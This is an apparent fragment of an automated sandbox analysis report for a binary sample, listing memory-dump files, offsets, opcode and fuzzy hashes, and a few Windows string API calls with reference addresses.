                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98